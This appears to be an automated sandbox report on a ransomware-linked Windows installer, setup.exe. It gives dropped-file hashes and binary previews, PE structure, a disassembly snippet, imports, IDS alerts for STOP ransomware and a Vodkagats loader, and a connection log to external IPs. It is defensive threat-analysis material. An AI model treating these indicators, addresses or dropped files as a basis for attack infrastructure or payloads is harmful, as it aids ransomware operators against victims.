              Preview:regf.Y.br(;2r...q..._)..h.h^Ol....0P",.%%..p.~Yc..y.6.\.vcIL..A..^.Go.Z.X.....)-Kj.x..'.u..2...U.MP.S..Mk.*..a.S...{.......D.6 [6^..>.#..U..m..h..s.....Y.fh.x+.%....ZV}{0.[.A{.G2M.;.Z.@......p\.../.U.j....D..8R...=.....'..2=Ny\..;?.p..(.-..GX......W....^..G..n%...L.5s...r.xY.1q.i&.d;.......F..R.Kn....c.tY.S.:y.N..A.9....J.$,.|.5.v.c.M..Sr8...+.f...#S..$....|(Ow..*W.p...X..j.v..t."..<...]......%.:0'q...XHSHh....ik.....M...&..:.VL..P...|...W&.ub....4..16e=66>..k.6.<h...^S...E.1.........[\`...1e...*.....Q...4a......HU ~.....C.h....?......U.K.....)..W..&.-..c..zc.../.U.w.Z. ........T|./RSz.J.........~.39-....... H...V.l..6.#..h%.j..2....2Yp.......Fj...-.......%.o.H.UHh|r.bP.......Z./T.U.....g...CV.@.......PGz.....r.._.&.$.z.+.[..K.%6...>..)I..s..;...5......G.ECpy....|E..........\.....n.RR...6pq.&.8.^..)z$.......[.C|..<....[%.^.`.!Z.BKo.Z..11.7U.f.>j.PE{].......x.ZN.NM.....].{....$....G0.HPS...w.?.......TT....q.P.Q>.=.J_..\t.FqlL.K.C..s.7yym{.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977554609312237
              Encrypted:false
              SSDEEP:192:esb5Pd1BilMoN4BHnq/b8cp2nn5+iImDzgTGLrqpwEMqHa0cZo:eUpidan4AQw508GG/McxpZo
              MD5:A81D81DF98AC463FE9C7B2A434E02153
              SHA1:E5B6F79FCF3EA90777EDD064F6506EC88C430C4F
              SHA-256:60E0B7E06A8C33A3897074821D8B15FA410FE67F843B3448DC1D3682363A62C4
              SHA-512:A440312C2F7E4FB68AC3E42CF5062FBD6B9E16B19C375A3D8A55DC82AE8326EC3D0B037515E83D64595C0369A0F361C14F0B7EEA74B8F724402B1DCB0756CF4D
              Malicious:false
              Preview:regf..l......:.%...;.D.iO[h....9...k...$a....B..U......8.l."..].A.b....ZvW.<.L..\y.C.,.vG=...^.S...v].K&...O..V=..a.wz.Ao|n_a....2(...g.....W.c7N....x6..*..C.tx[..~..e.Q....._....u.YH9.G.@....2'...B*C..r....3.Z(...j........lb...b&......(=.v1 ..2R..kH/.B...~..s.WAr.>.....p,.x.;;G..,..4.../O..G*.G.:...a.m..~.h..L..........9o. Alc...b..y.....O.....L.ju..... .?.s0..@T...i......s...7..c8nk.U..P...z..R.....>2.q.LJ..I..".w..\G.....r...jL......b....j.+......&.?.`...B..-..ie.z.....".9.$.9L...J8..>.....V..=}.X]b......$l....!.........-......G._@..*.W..e.v./.....q=......R..C........t^X..P......=.V.0.....o1...3..@]zr.c6..M...\.z*.YL+....z.JYo.X.T?.......f.m|$.ky..r.H.1....8.8.n.:...$+].i.........G0<..$h..[.].G.w..?N..b)..A(l.Y....2..]y~h...7.5_..a..$v.....3".8E.{.R.0.U1.....N.>T8.D(..*..+L..7..8i.6..q....v.i......./oS.......<....\8u.....Y.K!.&P.....m.^#|8..1....]...N..QV...........^\....).}.....!....O).V./y...;...C.2.P...m...u.n X`...kt...b.yA5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS-DOS executable, MZ for MS-DOS
              Category:dropped
              Size (bytes):760142
              Entropy (8bit):7.9153015716960144
              Encrypted:false
              SSDEEP:12288:szc8BjgyaJiEb2N43oEFdodmbI+9KvWzFk0QCsX5D7rIOpw9P:atgyCi2SSDd4L+9KOzWdCI5D7EOa9P
              MD5:057780D69BCA1E7B60F44DDCC6B67F29
              SHA1:E6199988A80F058A0B988C0D09C7489D8C5D7859
              SHA-256:8B8A9E373E346F46B25C6685EF32881EA9FB7F1B71FEEAA520AE34097539D709
              SHA-512:26F232533B52CA5AF83127518EB122C87D5EE5D7189EF7D6399D3FCB3ABC18B874D5E6FD15D231F5D321018976A544EDC85BC97152F4C7FA88BF29AD2751D282
              Malicious:true
              Preview:MZ......Ui.}T...F....../N.....ez..U..r9d......D..Hp.d...W..B/r.....L~...B.-.Z....w#..ZG.K?......b..>ayr....#..L....4.....y*..1n.....w..C.Cr.FL.5.f...l.;...._.\.+.rn...&....._..t.....5g......P.dA.yh...y.y}.K.7..G.K6~\.*.f*...q@8b.y.......@....a..$SJL....m.C....h..?..\.~......j..Q.{,.)....Kiyr..?~~+g.....e...t.<....{Y!5.P2.@..n.Bf.......o.].1..U..</`............)....:@..A..i~kO.\.Y.'.>.B.....c....ID..nx....U..-..m.....-.x.\R...Z...]4..:v...gBY..d.".....S..0.z$.B...z..&A..1.O...q.x.l2K{.."e.-.T4../e.=P..wh....B.Q.+R,i..+.jQ.J....b.....W.).YeN.S>9..I#0...H...\..G.~.`.,G...5....h...)....*O....6. ...n........^.j..F._..y.&.....@.:......C.%.b.|].._E.V...A...C.9.1..tq.....2r..tC4.Nw.'8.o...,..9u......h"3^|.y.)SY...PAY....j.e...a#..... ......+{.R".M/>N.s.Uig0.i.fk.x-...w.9.K.r.'.h./.J..6......T....../..D........C.[WZ..5Do5#.Sm..8..U.`.9........1b.......e.w..].A.`....0..I.Y.Y..X.q...:~.P.c...>...3..`..n.X..X.n-..s{.^. .N.?..u....A.i...?(...,s3p.w....J.'.3~+
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):783
              Entropy (8bit):7.729299069237043
              Encrypted:false
              SSDEEP:24:p/VtLlNzdpkzxlMxVRGGl4mOx7WgLiWbD:FZfpkzxu+mOx3LiED
              MD5:A24A7319C4BCB8809E1F3C3980E7FE44
              SHA1:95E1414799DC11D2EBB5618FD42B578A0F3AF8C1
              SHA-256:41885BB5AF9C1C9469DD4F5283FF0527C78E70134BCDE1FCE9B73EA66C5877D8
              SHA-512:48F592BFEF29820298633F570199575463A05BC9FB7239A6BA20A6046A57186CCFD290A694B935CBE8B74C59CC377E230B1F1C0F501A661F10FB454DAFA7E291
              Malicious:false
              Preview:<!DOC...d...&..,."..".1r.i.,...o..T[..h.e...G.....R;.e.=Su`i...T..vmZt....6.....M.t.T.]......XG..@.....9.o.9.=<.....zL...D:..l.Qhv.}_.....|{T.t..3.n...j/:{.%.o....&.U.j.2.!..{DJV.@.!.>d.7.&.W. 9..sm.e*$c.MXK.B.].../..7.U........~..".B...K...i5eQ...|.$....a...#x....A...x_.....(......W..5?v..o+.(..$k8].-Y-.v.$2V...t....7.e...6o..7...V."..H.".i,)...u..O.G.0>u.,.....%Z==.z....$m]..e....o.J<..i..%z.s14RN...#.q.kv&.3 VA..&.4...=....."'..I.3.V.Vb..T#g...Y.`+Q...1...{3............-....U.....t#+3GM|_."V...dOhR....../....).."N....t.D.;..t#.........b.........\.*.[.e.+6..Rqp.}.'.u....'..5H.3n..:....7.."2....sL.]..V..Wp[iR.........Me....F..'M.....gMt..,W0N...aw..^....K...C.9..4VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.465922559712902
              Encrypted:false
              SSDEEP:6144:EzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:qZHtBZWOKnMM6bFpZj4
              MD5:337A77C3BF8F5A5F284BD97613CEA970
              SHA1:D6F065D2ECC7036600BE885E488B5E7C01AF5E88
              SHA-256:4602C912389EB8F788CEF07DD8B4C0A54CA731C17A14552D50E59F614006D5CF
              SHA-512:9CECEEF4793CABDF33046DFFF3A24ABE1CC154A38EF99484469A89657F6335176A90F2581824FED4E2A29128EEBAE7F122F212D3262BE3625050F9B9632FABC0
              Malicious:false
              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&.'...................................................................................................................................................................................................................................................................................................................................................1.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.793847564600883
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:setup.exe
              File size:759'808 bytes
              MD5:13fd90197ba55324bd01b9fa97f5295a
              SHA1:313ac91a6ea6e75c0fe75f65d1254905491b59f6
              SHA256:be65a8d884dbb5c292c2ae94591cc6c86909bcd7ddb42588932afaf9ce15728e
              SHA512:a2d7a2b666f712b57f1cbed89598ad783589b93d4e0b67ccbe5d8ac4f8b3faf18c704a5606953319090dbf974f5cd9bc600ee3b7695c47cc92db5d9a8227f6fb
              SSDEEP:12288:hx2+AAPYnxYN43oEFdodmbI+9KvWzFk0QCsX5D7rIOpw9:hx2MYnxsSDd4L+9KOzWdCI5D7EOa9
              TLSH:63F402027390A871E6369A31BF1BC3B4565FFC654F596AEB13890A2F5D312E2CE72341
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L...W..a...........................
              Icon Hash:4555c9c242554549
              Entrypoint:0x409761
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x61BE8C57 [Sun Dec 19 01:35:19 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:ae274c29ca15928cb1e23f2e712ba155
              Instruction
              call 00007F5D919081CEh
              jmp 00007F5D91901BEEh
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              test eax, eax
              je 00007F5D91901D74h
              sub eax, 08h
              cmp dword ptr [eax], 0000DDDDh
              jne 00007F5D91901D69h
              push eax
              call 00007F5D91901387h
              pop ecx
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              push esi
              mov esi, ecx
              mov byte ptr [esi+0Ch], 00000000h
              test eax, eax
              jne 00007F5D91901DC5h
              call 00007F5D91904D3Dh
              mov dword ptr [esi+08h], eax
              mov ecx, dword ptr [eax+6Ch]
              mov dword ptr [esi], ecx
              mov ecx, dword ptr [eax+68h]
              mov dword ptr [esi+04h], ecx
              mov ecx, dword ptr [esi]
              cmp ecx, dword ptr [004AC630h]
              je 00007F5D91901D74h
              mov ecx, dword ptr [004AC3E8h]
              test dword ptr [eax+70h], ecx
              jne 00007F5D91901D69h
              call 00007F5D91908BA8h
              mov dword ptr [esi], eax
              mov eax, dword ptr [esi+04h]
              cmp eax, dword ptr [004AC2F0h]
              je 00007F5D91901D78h
              mov eax, dword ptr [esi+08h]
              mov ecx, dword ptr [004AC3E8h]
              test dword ptr [eax+70h], ecx
              jne 00007F5D91901D6Ah
              call 00007F5D91908407h
              mov dword ptr [esi+04h], eax
              mov eax, dword ptr [esi+08h]
              test byte ptr [eax+70h], 00000002h
              jne 00007F5D91901D76h
              or dword ptr [eax+70h], 02h
              mov byte ptr [esi+0Ch], 00000001h
              jmp 00007F5D91901D6Ch
              mov ecx, dword ptr [eax]
              mov dword ptr [esi], ecx
              mov eax, dword ptr [eax+04h]
              mov dword ptr [esi+04h], eax
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 10h
              mov eax, dword ptr [004ABBF8h]
              xor eax, ebp
              mov dword ptr [ebp-04h], eax
              mov edx, dword ptr [ebp+18h]
              push ebx
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2010 build 30319
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x18f6c0x78.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000xdd08.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43200x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x18a140x18c00cbe16acbd089963f3f3d7805a1fdcaf7False0.5078716856060606data6.30973893669103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x1a0000x1101680x92a006b67ecc5d2255e6e6340f0c5a5b5ca60False0.9914348891730606data7.992771360591036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x12b0000xdd080xde00add10ab7b48c05efee653ec52d74512cFalse0.4087309966216216data4.403473093496916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_CURSOR0x136f480x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7598684210526315
              RT_CURSOR0x1370900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4342105263157895
              RT_CURSOR0x1371c00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 00.44166666666666665
              RT_CURSOR0x1372b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.08888367729831144
              RT_ICON0x12b5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland0.5054151624548736
              RT_ICON0x12b5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway0.5054151624548736
              RT_ICON0x12b5e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden 0.5054151624548736
              RT_ICON0x12be880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.6568949343339587
              RT_ICON0x12be880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.6568949343339587
              RT_ICON0x12be880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.6568949343339587
              RT_ICON0x12cf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland0.6561371841155235
              RT_ICON0x12cf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway0.6561371841155235
              RT_ICON0x12cf580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden 0.6561371841155235
              RT_ICON0x12d8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland0.4803941908713693
              RT_ICON0x12d8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway0.4803941908713693
              RT_ICON0x12d8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden 0.4803941908713693
              RT_ICON0x12fda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.5086772983114447
              RT_ICON0x12fda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.5086772983114447
              RT_ICON0x12fda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.5086772983114447
              RT_ICON0x130e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland0.2897121535181237
              RT_ICON0x130e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway0.2897121535181237
              RT_ICON0x130e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden 0.2897121535181237
              RT_ICON0x131d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland0.4084101382488479
              RT_ICON0x131d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway0.4084101382488479
              RT_ICON0x131d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden 0.4084101382488479
              RT_ICON0x1323f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland0.4190751445086705
              RT_ICON0x1323f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway0.4190751445086705
              RT_ICON0x1323f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden 0.4190751445086705
              RT_ICON0x1329580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland0.23070539419087138
              RT_ICON0x1329580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway0.23070539419087138
              RT_ICON0x1329580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden 0.23070539419087138
              RT_ICON0x134f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland0.2915103189493433
              RT_ICON0x134f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway0.2915103189493433
              RT_ICON0x134f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden 0.2915103189493433
              RT_ICON0x135fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland0.3139344262295082
              RT_ICON0x135fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway0.3139344262295082
              RT_ICON0x135fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden 0.3139344262295082
              RT_ICON0x1369300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland0.35638297872340424
              RT_ICON0x1369300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway0.35638297872340424
              RT_ICON0x1369300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden 0.35638297872340424
              RT_STRING0x1385d80x3bedataSami LappishFinland0.4603340292275574
              RT_STRING0x1385d80x3bedataSami LappishNorway0.4603340292275574
              RT_STRING0x1385d80x3bedataSami LappishSweden 0.4603340292275574
              RT_STRING0x1389980x36adataSami LappishFinland0.459954233409611
              RT_STRING0x1389980x36adataSami LappishNorway0.459954233409611
              RT_STRING0x1389980x36adataSami LappishSweden 0.459954233409611
              RT_ACCELERATOR0x136ea80x90dataSami LappishFinland0.6875
              RT_ACCELERATOR0x136ea80x90dataSami LappishNorway0.6875
              RT_ACCELERATOR0x136ea80x90dataSami LappishSweden 0.6875
              RT_ACCELERATOR0x136e000xa8dataSami LappishFinland0.6785714285714286
              RT_ACCELERATOR0x136e000xa8dataSami LappishNorway0.6785714285714286
              RT_ACCELERATOR0x136e000xa8dataSami LappishSweden 0.6785714285714286
              RT_GROUP_CURSOR0x1370780x14data1.15
              RT_GROUP_CURSOR0x1383580x30data1.0
              RT_GROUP_ICON0x130e500x30dataSami LappishFinland0.9375
              RT_GROUP_ICON0x130e500x30dataSami LappishNorway0.9375
              RT_GROUP_ICON0x130e500x30dataSami LappishSweden 0.9375
              RT_GROUP_ICON0x12cf300x22dataSami LappishFinland0.9705882352941176
              RT_GROUP_ICON0x12cf300x22dataSami LappishNorway0.9705882352941176
              RT_GROUP_ICON0x12cf300x22dataSami LappishSweden 0.9705882352941176
              RT_GROUP_ICON0x136d980x68dataSami LappishFinland0.7307692307692307
              RT_GROUP_ICON0x136d980x68dataSami LappishNorway0.7307692307692307
              RT_GROUP_ICON0x136d980x68dataSami LappishSweden 0.7307692307692307
              RT_VERSION0x1383880x24cdata0.5493197278911565
              None0x136f380xadataSami LappishFinland1.8
              None0x136f380xadataSami LappishNorway1.8
              None0x136f380xadataSami LappishSweden 1.8
              DLLImport
              KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
              USER32.dllLoadMenuW
              ADVAPI32.dllLookupAccountSidW
              SHELL32.dllFindExecutableA
              ole32.dllCoGetInstanceFromFile
              Language of compilation systemCountry where language is spokenMap
              Sami LappishFinland
              Sami LappishNorway
              Sami LappishSweden
              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
              2024-07-30T01:04:58.840639+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971380192.168.2.6188.40.141.211
              2024-07-30T01:04:43.042605+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key4971380192.168.2.6188.40.141.211
              2024-07-30T01:04:43.030191+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload4971480192.168.2.6188.40.141.211
              2024-07-30T01:04:39.500844+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49711443192.168.2.6188.114.96.3
              2024-07-30T01:04:53.589483+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971380192.168.2.6188.40.141.211
              2024-07-30T01:04:41.956344+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49712443192.168.2.6188.114.96.3
              2024-07-30T01:04:55.448593+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971952.165.165.26192.168.2.6
              2024-07-30T01:04:53.678432+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49718443192.168.2.6188.114.96.3
              2024-07-30T01:04:48.323516+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH4971380192.168.2.6188.40.141.211
              2024-07-30T01:05:29.544243+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435682713.85.23.86192.168.2.6
              2024-07-30T01:05:01.545920+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH49724443192.168.2.6188.114.96.3
              TimestampSource PortDest PortSource IPDest IP
              Jul 30, 2024 01:04:38.563843966 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:38.563894033 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:38.563971043 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:38.584944963 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:38.584973097 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.076318979 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.076494932 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.138201952 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.138235092 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.138591051 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.138648033 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.142046928 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.188541889 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.500850916 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.500938892 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:39.500967026 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.500996113 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.504371881 CEST49711443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:39.504394054 CEST44349711188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.061558962 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.061592102 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.061702967 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.081115007 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.081130981 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.561439991 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.561538935 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.567146063 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.567153931 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.568249941 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.568311930 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.570451021 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.616503000 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956413031 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956506014 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.956518888 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956563950 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.956569910 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956614971 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.956619024 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956686020 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:41.956712961 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.956820965 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.957623959 CEST49712443192.168.2.6188.114.96.3
              Jul 30, 2024 01:04:41.957642078 CEST44349712188.114.96.3192.168.2.6
              Jul 30, 2024 01:04:42.357778072 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.358309984 CEST4971480192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.374353886 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:42.374469995 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.374666929 CEST4971380192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.375199080 CEST8049714188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:42.375248909 CEST4971480192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.375320911 CEST4971480192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:42.390316963 CEST8049713188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:42.390887022 CEST8049714188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:43.027211905 CEST8049714188.40.141.211192.168.2.6
              Jul 30, 2024 01:04:43.030190945 CEST4971480192.168.2.6188.40.141.211
              Jul 30, 2024 01:04:43.042503119 CEST8049713188.40.141.211192.168.2.6
